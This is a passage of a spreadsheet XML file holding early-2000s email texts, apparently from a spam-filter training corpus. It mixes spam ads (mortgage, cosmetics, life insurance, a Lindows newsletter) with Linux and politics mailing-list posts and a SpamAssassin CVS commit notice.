    <t xml:space="preserve">&lt;html&gt;
 We w&lt;!--church--&gt;ant to help you get lo&lt;!--jesus--&gt;wer HOUSE pa&lt;!--dads trailer--&gt;yments, with no ha&lt;!--ice cream00--&gt;ssle
 &lt;p&gt;
 &lt;A href=http://www.status100.com/mortgage/index34.html&gt;Cli&lt;!--bye love me--&gt;ck&lt;/a&gt;
 &lt;!--love paw--&gt;&lt;p&gt;
 To st&lt;!--jojo--&gt;op recie&lt;!--teddy--&gt;ving this, rem&lt;!--jokes--&gt;ove from our l&lt;!--love always--&gt;ink on the s&lt;!--love--&gt;ite.
 &lt;/html&gt;
 56281814119876554443333
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] understanding high false negative rate 
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; course, it instantly picked up on 'received:2001' as a non-ham. 
                                                             -spam.
 *sigh*
 -- 
 Anthony Baxter     &lt;anthony@interlink.com.au&gt;   
 It's never too late to have a happy childhood.
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry about that :) 
 Didn't think before sending... So I didn't realize that Reply-To was to 
 the list and not to the sender (as it usually is). 
 Anyawy, I was asking Harri if he could point me a few advices on how to 
 build my own apt repositry for RH updates. There is a tutorial of somekind 
 at http://apt-rpm.tuxfamily.org/ which I'm following right now, but if 
 there is some other good advices, let me know!
 Regards,
 Peter
 On Mon, Feb 04, 2002 at 02:33:29PM +0200, Peter Peltonen wrote:
 &gt; On Fri, Feb 01, 2002 at 05:41:32PM +0200, Harri Haataja wrote:
 &gt; &gt; I have a local one for the main and upgrades from somewhere plus my own
 &gt; &gt; at $ORKPLACE.
 &gt; 
 &gt; Olen ajatellut pystytt itselleni lokaalin apt-varaston, kun Suomesta ei 
 &gt; tunnu lytyvn julkista peili. Osaisitko avittaa hiukan asiassa, eli 
 &gt; kuinka lhte liikkeelle? Ensin kannattanee peilata varsinainen RH:n rpm:t 
 &gt; jostain, vaan mill softalla (rsync?) ja mist (funet?) tuo kannattaa 
 &gt; tehd, ajatuksia?
 &gt; 
 &gt; -- 
 &gt; Peter
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; 
 -- 
 Peter
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Ian Andrew Bell writes:
 &gt; I think that this and other articles confuse Socialism with 
 &gt; Bureaucracy.  Libertarianism as implemented in North America is not 
 &gt; exactly the shining pinnacle of economic efficiency.
 Libertarianism is implemented in North America? Where?!?!?
 &gt; Just try starting a telephone company in the US or (even worse) 
 &gt; Canada.  It can take a year or more to get the blessing of our own 
 &gt; "Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more 
 &gt; socialist leaning Canada, Industry Canada and the CRTC).
 Telecom regulations are an example of implemented Libertarianism?
 And for how screwed up North America's telecom industries and
 regulators are, they're better than much of the rest of the
 world, where it doesn't just "take a year or more" to get
 started: it's impossible/illegal. 
 Matters of degree, matter.
 &gt; Yet, despite all of this intense regulation and paper pushing, as 
 &gt; well as regulatory scrutiny by the FTC, SEC, and IRS, the 
 &gt; executives of Telecom Companies have managed to bilk the investment 
 &gt; community for what looks to be tens of billions of dollars.  They 
 &gt; finished their routine with the a quadruple lutz -- laying off 
 &gt; hundreds of thousands of workers when it all came crashing down.
 &gt; 
 &gt; So.. tell me again.. how are we better off?
 We can lose billions of dollars, and have hundreds of thousands of 
 people laid off... and after it all, our diets, health, longevity, 
 and freedom to pursue activities of our own choosing are still the 
 envy of billions of people. 
 Would you rather be unemployed, broke, and in possession of career
 skills which merely match the local average in:
   - North America, or 
   - India/Peru/Egypt/Philippines/etc
 ????
 - Gordon
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] ipfw vs ipchains vs iptables
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 29 Jul 2002, Philip Reynolds wrote:
 &gt; Well, that doesn't help you reading your listing.
 i can read it fine. :)
 if you want readability - a good script is worth just as much.
 &gt; &gt; isnt the ipfw code in BSD brand-new aswell? (the old code was
 &gt; &gt; rewritten for OpenBSD recently due to licensing concerns).
 &gt; 
 &gt; I think you're talking about IPFilter, and OpenBSD's new PF code.
 &gt; Now who's talking FUD :)
 ah doh! yes.
 i thought the firewalling code on all the BSDs was fairly related -
 sorry. So FreeBSD's ipfw is not encumbered in the same way the old
 OBSD firewalling was?
 &gt; Perhaps, although I think when seriously considering something like
 &gt; a firewall, tried and trusted means a hell of a lot. IPFilter would
 &gt; probably win that race.
 to an extent, i guess so, yes. but i've a few boxes with reasonable 
 uptimes that run netfilter/iptables. (i've one that has crashed twice 
 now after 60+ day uptimes. but that doesnt seem to be netfilter).
 course, there's a lot more that can go wrong with a firewall than the
 firewall code. in that case get 2 boxes and heartbeat them.
 &gt; I was talking in terms of the actual firewall. If the company in
 &gt; question knows plenty about Linux and nothing about FreeBSD, I'd go
 &gt; with a Linux box, merely because when something goes wrong (that
 &gt; isn't got to do with ipfw/ipchains/ipfilter), then someone knows
 &gt; how to fix it.
 indeed. couldnt agree more.
 (that's the nice thing about *nix - fact we /can/ have nit-picking 
 arguments about which *nix and firewall code is better).
 &gt; As I said before, I have little to no in-depth experience with
 &gt; netfilter, I'm aware of it's basic capabilities and had a quick
 &gt; look at it's features in early 2.4 editions but that's it.
 i've no experience of ipfw. (closest i've come is looking at IPFilter 
 for IRIX - but it had a problem in that it wasnt maintained 
 anymore. however, while the englishy syntax is nice, i dont think 
 iptables command &lt;args&gt; syntax is a big obstacle).
 anyway.. there's choice. and as i understand it, with the advent of 
 netfilter/iptables there's now almost nothing between them from a 
 technical POV. (apart from ipfw being in use a lot longer).
 regards,
 -- 
 Paul Jakma	paul@clubi.ie	paul@jakma.org	Key ID: 64A2FF6A
 Fortune:
 What a strange game.  The only winning move is not to play.
 		-- WOP, "War Games"
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Gstreamer update
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 26 Jul 2002 13:40:57 +0100 (BST), Michl Alexandre Salim &lt;salimma1@yahoo.co.uk&gt; wrote:
 &gt;  --- Angles Puglisi &lt;angles@aminvestments.com&gt; wrote:
 &gt; &gt; 
 &gt; &gt; I still think there's got to be a way to get the
 &gt; &gt; packages that make gnomehide
 &gt; &gt; from the Limbo CDs, they would be newer.
 &gt; &gt; 
 &gt; Surely you just need to recompile and install them in
 &gt; order?
     Nope- this one's all about gnome-vfs2 and the developers understand each other's parts- it's a programming issues.  Some versions work together, some don't.  Just like rep-gtk and audiofile was for sawfish, in the previous version of Ximian-gnome.  :(
 .
 &gt; Ximian packages are awful - I had recurring problems
 &gt; with their packaged libxslt a few months back.
     Yeah...That's why I was hoping someone else had a 'more gospel' set of files.  Oh, well.  I've found a URL on my system I can get to'em with Nautilus.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</si>
  <si>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Subject: Re: [ILUG] RH7.3 on Cobalt - the saga continues
</t>
  </si>
  <si>
    <t xml:space="preserve">John,
 let me guess, you haven't tried the boot parameter root=/dev/hda2 if you
 are using lilo??
 //Anders//
 On Mon, 2002-08-12 at 17:49, John P. Looney wrote:
 &gt;  I'm getting places.
 &gt; 
 &gt;  Turns out that you can't have your /boot filesystem ext3, and the
 &gt; /boot/vmlinux.gz file has to be a gzipped vmlinux file (not a vmlinuz one,
 &gt; which though obvious...isn't, when you've been hitting your head off a
 &gt; wall for a few days).
 &gt; 
 &gt;  Also, when you mkfs a filesystem that's called "/boot", as far as the
 &gt; redhat /etc/fstab is concerned, it wipes that, so when you boot a rescue
 &gt; CD, it doesn't mount /dev/hda1 as /boot, and doesn't inform you of this.
 &gt; 
 &gt;  (so, it's dead easy to work away on /mnt/sysimage/boot thinking you are
 &gt; working on /dev/hda1, and wondering why no matter what you do, nothing
 &gt; changes).
 &gt; 
 &gt;  Aaaaanyway. I have it booting the redhat kernel. But, the kernel isn't
 &gt; loading root as /dev/hda2 - it keeps mounting /dev/hda1.
 &gt; 
 &gt;  Curiously, when I go into the boot prom, an use
 &gt; 
 &gt;  "set_params" I can tell it to mount /dev/hda2 as root. But then it uses
 &gt; the PROM copy of the kernel (dodgy 2.2.16 kernel), which doesn't know
 &gt; ext3, so wants to fsck up my disk.
 &gt; 
 &gt;  rdev on the vmlinux file, before gzipping doesn't work. I assume you
 &gt; can't run rdev on the gzipped version. Any other ideas on how to tell a
 &gt; kernel where it's root fs is ?
 &gt; 
 &gt; Kate
 &gt; 
 &gt; 
 &gt; -- 
 &gt; Irish Linux Users' Group: ilug@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt; List maintainer: listmaster@linux.ie
 -- 
 Best Regards
 Anders Holm
 Critical Path Technical Support Engineer
 ========================================
 Tel USA/Canada: 1 800 353 8437
 Tel Worldwide:  +1 801 736 0806
 E-mail:         technical.support@cp.net
 Internet:       http://support.cp.net
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Man finds lost marbles after 70 years....
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8305902,1717/
 Date: 2002-09-27T09:52:31+01:00
 (Stuff.co.nz)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Entrepreneurs
</t>
  </si>
  <si>
    <t xml:space="preserve">An apparent quote from Dubya, from the Times (sent to me by my Dad):
 http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.html
 ------------------------------------------------------------------------------
 TONY BLAIR's special relationship with George W. Bush is under
 considerable strain. Not only do the two disagree on Yassir Arafat's
 tenure as leader of the Palestinian Authority, but Blair has started
 telling disparaging anecdotes about the President.
 Baroness Williams of Crosby recalled a story told to her by 'my good
 friend Tony Blair' recently in Brighton. Blair, Bush and Jacques
 Chirac were discussing economics and, in particular, the decline of
 the French economy. 'The problem with the French,' Bush confided in
 Blair, 'is that they don't have a word for entrepreneur.'
 ------------------------------------------------------------------------------
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Saou wrote:
 &gt; OK, I'll add this.
 Cool :)
 &gt; Requiring a file that isn't part of an rpm is not possible, no, except
 &gt; maybe by stopping the build process if it isn't found... but that's errr...
 &gt; ugly!
 &gt; And I really think that for people who installed a kernel from sources, the
 &gt; easiest is to install the alsa kernel drivers from source too...
 Yes, it is...  But then alsa-driver requires alsa-kernel, and I don't quite 
 like --nodeps...
 &gt; This would be a tricky one since to use the "--with &lt;name&gt;" feature of
 &gt; rpmbuild, I think you'd need to add individual handling of each and every
 &gt; card :-/
 That's ok.  I was only considering it for the sake of tweaking anyway, not 
 for some real-world need :).
 &gt; That's what the "alsa-driver" is there for, create all the base files
 &gt; excluding the kernel drivers. What I would suggest for dependency reasons
 &gt; it to install an "alsa-kernel" for the original kernel (you've kept it,
 &gt; right? ;-)) and install ALSA modules from source for custom kernels built
 &gt; from source.
 Um...  I keep 2.4.18-12.2 for emergency sitations (like I forget to include 
 keyboard support in kernel, dumb me), but alsa-kernel_2.4.18-10 does not 
 require kernel-2.4.18-10, so that's ok.
 &gt; Matthias
 -silent
 -- 
 ... And on the seventh day, God was arrested for tresspassing.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Look 10 Years Younger-FREE SAMPLE !!!!!!!! esoy
</t>
  </si>
  <si>
    <t xml:space="preserve">THIS E-MAIL AD IS BEING SENT IN FULL COMPLIANCE WITH U.S. SENATE BILL 1618, TITLE #3, SECTION 301
 TO REMOVE YOURSELF SEND A BLANK E-MAIL TO:removal992002@yahoo.com
 FREE Sample ! FREE Tape!
 New Cosmetic Breakthru!
 Look 10 Years Younger in (6) weeks or Less!
 Look Good Duo..From the INSIDE out.....
 &gt;From the OUTSIDE in!
 Introducing....Natures answer to FASTER
 and more OBVIOUS RESULTS for:
 ** WRINKLES
 ** CELLULITE
 ** DARK CIRCLES
 ** BROWN SPOTS...
 ** LIFTS THE SKIN
 ** STRENGHTENS THE HAIR AND NAILS
 Also Helps to........
 * Reduce Cell Damage From Excessive Sun Exposure
 * Stimulate Colllagen Formation
 * Provide Protection Against Skin Disorder
 * and is HOPOALLERGENIC
 Find Out WHAT! WHERE! AND How!
 TO ORDER YOUR FREE SAMPLE AND TAPE SEND YOUR
 REQUEST TO:
 LOOKYOUNGNOW2000@YAHOO.COM
 Subject: subscribe to Free Sample:
 Your Name: ...................
 Street address: ..............
 City: ........................
 State and zip code: ..........
 Email address: ...............
 sxjrohvneydjgucyfa
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin MANIFEST,1.100.2.11,1.100.2.12
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin
 In directory usw-pr-cvs1:/tmp/cvs-serv6501
 Modified Files:
       Tag: b2_4_0
 	MANIFEST 
 Log Message:
 removed old evolver
 Index: MANIFEST
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/MANIFEST,v
 retrieving revision 1.100.2.11
 retrieving revision 1.100.2.12
 diff -b -w -u -d -r1.100.2.11 -r1.100.2.12
 --- MANIFEST	28 Aug 2002 13:50:15 -0000	1.100.2.11
 +++ MANIFEST	28 Aug 2002 16:55:16 -0000	1.100.2.12
 @@ -50,7 +50,6 @@
  masses/CORPUS_POLICY
  masses/CORPUS_SUBMIT
  masses/craig-evolve.c
 -masses/evolve.cxx
  masses/freqdiff
  masses/hit-frequencies
  masses/lib/Mail/ArchiveIterator.pm
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Julian wrote :
 &gt; One of the things you need to understand with gnome2 is that while they
 &gt; did simplify a lot of things, most of the configuration options people
 &gt; found very useful are still available through gconf. Learn to love
 &gt; gconf-editor ;) -- metacity can have sloppy focus (Desktop Preferences
 &gt; -&gt; Window Focus -- there's actually GUI for that), and the delay until
 &gt; raising (and whether it raises) can be set in gconf-editor,
 &gt; /apps/metacity/general/auto_raise and auto_raise_delay
 Well, I stand corrected :-)
 The thing is, I hadn't used gconf-editor yet... and it's exactly what I
 feared, old "not so good" memories are coming back : It looks exactly like
 a GNOME RegEdit :-/ Oh well.
 I still hope that the few missing features I'm still looking for will be
 added in the next 2.0.x releases, like for example being able to have the
 panel always under *all* other windows (if you know how to do that, I'm
 really interested! ;-)).
 Cheers,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</si>
  <si>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Gregory Alan Bolcer wrote:
 &gt;at zones to most expediently keep order.  
 &gt;
 &gt;The problem is that politics have gotten so muddied
 &gt;nowadays, that shouting down and unpeaceably disrupting
 &gt;political rallies that you don't agree with has become
 &gt;common practice.  The courts have constantly ruled
 &gt;that there are some restrictions on the first amendment.
 &gt;They teach you that your very first year of law school.
 &gt;  
 &gt;
 What a load of crap. Politics are somehow more muddy now?  I'd say that 
 its considerably
 clearer - the vast majority of people feel disenfranchised, and the 
 common practice of
 putting protestors in boxes is done usually to hide them from TV 
 cameras, visiting dignitaries,
 etc, further exacerbating those feelings.
 "Unpeaceably disrupting political rallies" is now usually done by police 
 with riot gear and pepper spray.
 We had a good one here a month or so ago - a few people peaceably 
 strayed from the permit area,
 which was nearly a mile from the site of the meeting of finance 
 ministers held here (the motorcade drove
 by it for about 10 seconds), and were immediately gassed,  beaten and 
 arrested. Not very muddied at all.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: re: Now Save 70% On Your Life Insur ance - Free Custom Quote 29658
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;font face=3D"arial" size=3D"5" color=3D"#ffffff"&gt;
 Save 70% On Your Life Insurance!
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table border=3D"0" width=3D"500" cellpadding=3D"0" cellspacing=3D"0" alig=
 n=3D"center"&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;p align=3D"center"&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"5" color=3D"#000000"&gt;&lt;b&gt;Check Out These Price=
 s!!!&lt;/b&gt;&lt;/font&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"3"&gt;$250,000&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;n=
 bsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;
 $500,000&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 $1,000,000&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 Age Male Female&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Age Male Female&amp;nbsp;&amp;=
 nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Age Male Female&lt;br&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;30&amp;nbsp;&amp;nbsp;&amp;nbsp; $12&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $11&amp;n=
 bsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 30&amp;nbsp;&amp;nbsp;&amp;nbsp; $19&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $15&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 30&amp;nbsp;&amp;nbsp;&amp;nbsp; $31&amp;nbsp;&amp;nbsp;&amp;nbsp; $27&lt;/p&gt;
 &lt;p align=3D"center"&gt;40&amp;nbsp;&amp;nbsp;&amp;nbsp; $15&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $13&amp;n=
 bsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 40&amp;nbsp;&amp;nbsp;&amp;nbsp; $26&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $21&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 40&amp;nbsp;&amp;nbsp;&amp;nbsp; $38&amp;nbsp;&amp;nbsp;&amp;nbsp; $37&lt;/p&gt;
 &lt;p align=3D"center"&gt;50&amp;nbsp;&amp;nbsp;&amp;nbsp; $32&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $24&amp;n=
 bsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 50&amp;nbsp;&amp;nbsp;&amp;nbsp; $59&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; $43&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 50&amp;nbsp;&amp;nbsp;&amp;nbsp; $107&amp;nbsp;&amp;nbsp;&amp;nbsp; $78&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp; 60&amp;nbsp;&amp;nbsp;&amp;nbsp; $75&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp=
 ; $46&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 60&amp;nbsp;&amp;nbsp;&amp;nbsp; $134&amp;nbsp;&amp;nbsp;&amp;nbsp; $87&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nb=
 sp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 60&amp;nbsp;&amp;nbsp;&amp;nbsp; $259&amp;nbsp;&amp;nbsp;&amp;nbsp; $161&lt;br&gt;
 &lt;br&gt;
 (Smoker rates also available)&lt;br&gt;
 &lt;br&gt;
 &lt;font size=3D"2"&gt;Take a minute to fill out the simple form below and recei=
 ve a &lt;b&gt;FREE
 INSTANT&lt;/b&gt; quote comparing the best values from among &lt;b&gt;HUNDREDS&lt;/b&gt; of =
 the
 nation's top insurance companies!&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;font face=3D"arial" size=3D"7" color=3D"#000000"&gt;
 &lt;b&gt;DON'T MISS THIS!&lt;/b&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;p align=3D"center"&gt;
 &lt;font face=3D"arial" size=3D"5" color=3D"#0000ff"&gt;
 &lt;a href=3D"http://216.126.187.164/123/"&gt;&lt;b&gt;Click Here For A Free Custom Qu=
 ote!!&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;table border=3D"0" width=3D"500" cellpadding=3D"0" cellspacing=3D"0" alig=
 n=3D"center"&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D"#FF0000"&gt;
 &lt;p align=3D"center"&gt;
 &lt;b&gt;
 &lt;font face=3D"arial" size=3D"5" color=3D"#ffffff"&gt;
 Save 70% On Your Life Insurance!
 &lt;/font&gt;
 &lt;/b&gt;
 &lt;/p&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D"center"&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D&lt;br&gt;
 To be removed from our mailing list &lt;A HREF=3D"mailto:bbyaletesi@aol.com"&gt;=
  CLICK HERE&lt;/a&gt;&lt;br&gt;
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;/body&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;html&gt;&lt;p&gt;&lt;p&gt;&lt;body bgcolor=3D"#ffffff" link=3D"#0000ff" vlink=3D"#0000ff" a=
 link=3D"ff0000"&gt;&lt;p&gt;&lt;p&gt;&lt;table border=3D"0" width=3D"500" cellpadding=3D"0" =
 cellspacing=3D"0" align=3D"center"&gt;&lt;p&gt;&lt;tr&gt;&lt;p&gt;&lt;td bgcolor=3D"#FF0000"&gt;&lt;p&gt;&lt;p=
  align=3D"center"&gt;&lt;p&gt;&lt;b&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lindows.com: Michael's Minute: Do the Math...Dispel the Myths
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_LINDOWS_6a72a16a171d3ceefdc7477961871f6d
 Content-Type: text/plain;
 	charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 If this message is not displaying properly, click here
 &lt;http://lindows.com/mm&gt; to launch it in your browser.
 &lt;http://lindows.com/&gt; 
 Michael's Minute: Do the Math...Dispel the Myths 
 A reporter came by the Lindows.com &lt;http://www.lindows.com/&gt;  offices
 last Friday. He told me that he wanted to try and use
 &lt;http://www.lindows.com/lindows_products_lindowsos.php&gt; LindowsOS to
 write a story, but he didn't think it was possible because his office
 used Microsoft Word .doc files. I asked him to have a seat and watch.  
 I turned on the Walmart.com &lt;http://www.lindows.com/walmart&gt; computer
 and then clicked on the running man  &lt;http://www.lindows.com/warehouse&gt;
 which took me to the Click-N-Run Warehouse
 &lt;http://www.lindows.com/warehouse&gt;  where I installed OpenOffice
 &lt;http://www.lindows.com/openoffice&gt;  using Click-N-Run. I then clicked
 the "Run It"  button which opened the word processor OpenOffice Writer.
 I then typed "Linux is ready for the desktop and consumers can save
 hundreds using LindowsOS." I selected "Save as Microsoft Word."
 The reporter was not only surprised, he was amazed. Like many reporters,
 he was under the impression that Linux was only for servers. The simple
 word processor demonstration went a long way to show him otherwise. For
 Linux to become a driving force in desktop computing it will have to
 overcome a couple of myths. 
 The first myth is that Linux is too hard to install and configure. That
 may have been true in the past, but we've annihilated this myth with the
 latest version of LindowsOS --which installs on most machines in under 5
 minutes. It's point- and-shoot easy - easier than any other operating
 system (Microsoft products included). See for yourself at &lt;http://www.tryoutlinux.com/&gt; .  
 The other myth is that Linux is just for the server and none of the
 graphical programs --which desktop users have come to rely on-- exist.
 Not only have many of the Linux software programs made quantum leaps
 over the last couple of years, but they've gotten quite good at reading
 and writing Microsoft formats. The easiest way to experience these
 products is via the Click-N-Run  &lt;http://www.lindows.com/warehouse&gt;
 Warehouse.
  Here's a quick list of some of the quality programs available today in
 the Warehouse &lt;http://www.lindows.com/warehouse&gt; all downloaded and
 installed with a single click:
 OpenOffice - This one installation will equip a computer with an
 impressive collection of productivity programs each of which will open
 the corresponding Microsoft file format and allow you to edit files and
 swap them with Microsoft counterparts. &lt;www.lindows.com/openoffice&gt;
 Programs included are:
 OpenOffice Writer - Word processor (reads Microsoft Word docs) 
 OpenOffice Calc - Spreadsheet (reads Microsoft Excel) 
 OpenOffice Impress- Presentation package (reads Microsoft PowerPoint)
 OpenOffice Draw - A vector based drawing program
 Click here &lt;http://www.lindows.com/openofficeflash&gt;  for a great
 tutorial on getting to know OpenOffice.
 GIMP &lt;www.lindows.com/gimp&gt; If you are familiar with Adobe's Photoshop,
 you'll want to Click-N-Run GIMP. It's a powerful image editor. 
 Evolution &lt;www.lindows.com/evolution&gt; For those used to Microsoft's
 Outlook email program Evolution will make them feel right at home. Check
 out how easy it is to use &lt;http://www.lindows.com/evolution&gt; .
 Flowchart Pro, which is similar to Microsoft's Visio, is a  rich
 charting program that makes it possible to create flow charts and
 organizational charts, plus more. See how easy it for yourself, visit
 Flowchart Pro at &lt;http://www.lindows.com/flowchartpro&gt;
 This is just a handful of the quality programs available in the
 Warehouse &lt;www.lindows.com/warehouse&gt; that make Linux a practical choice
 for the desktop today. And if you're still not convinced, then do the
 math.
 &lt;http://www.lindows.com/walmart&gt; 
 For  a total cost of $499 &lt;http://www.lindows.com/walmart&gt; , including
 all  software, computer users save  more than $800  for a complete
 system. 
 With such major price differentials between the two similarly equipped
 systems, any business, school or home will find their computing dollars
 stretched much further running LindowsOS. 
 Michael Robertson
 Please visit &lt;http://support.lindows.com/&gt;  to
 answers questions you may have about LindowsOS or Lindows.com.
 Bringing Choice to Your Computer! 
 LindowsOS is presently available on LindowsOS Certified Computers being
 offered from Lindows.com  &lt;http://www.lindows.com/builder&gt; Builder
 partners.  The General Release of LindowsOS (available now for download
 and preview to Lindows.com  &lt;http://lindows.com/signup&gt; Insider
 partners) will be made available later this year for those wishing to
 install and run LindowsOS on their existing computer hardware.  The
 General Release version will support a wider range of computer hardware
 and includes unique features such as a "Friendly-Install" alongside an
 existing MicrosoftR Windows operating system, a streamlined installation
 process which requires no computer knowledge, and the ability to run a
 select set of "bridge" Windows-compatible programs. For more information
 see  &lt;http://www.lindows.com/products&gt;
 LindowsOS and Lindows.com are trademarks of Lindows.com, Inc. LinuxR is
 a registered trademark of Linus Torvalds. MicrosoftR WindowsR operating
 system is a registered trademark or service mark of the Microsoft
 Corporation.
 mm19
 ___________________________________________________________
 To change your mailing list options please go to &lt;www.lindows.com/update&gt;
 ------=_LINDOWS_6a72a16a171d3ceefdc7477961871f6d
 Content-Type: text/html;
 	charset="us-ascii"
 Content-Transfer-Encoding: quoted-printable
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
 charset=3Dus-ascii"&gt;
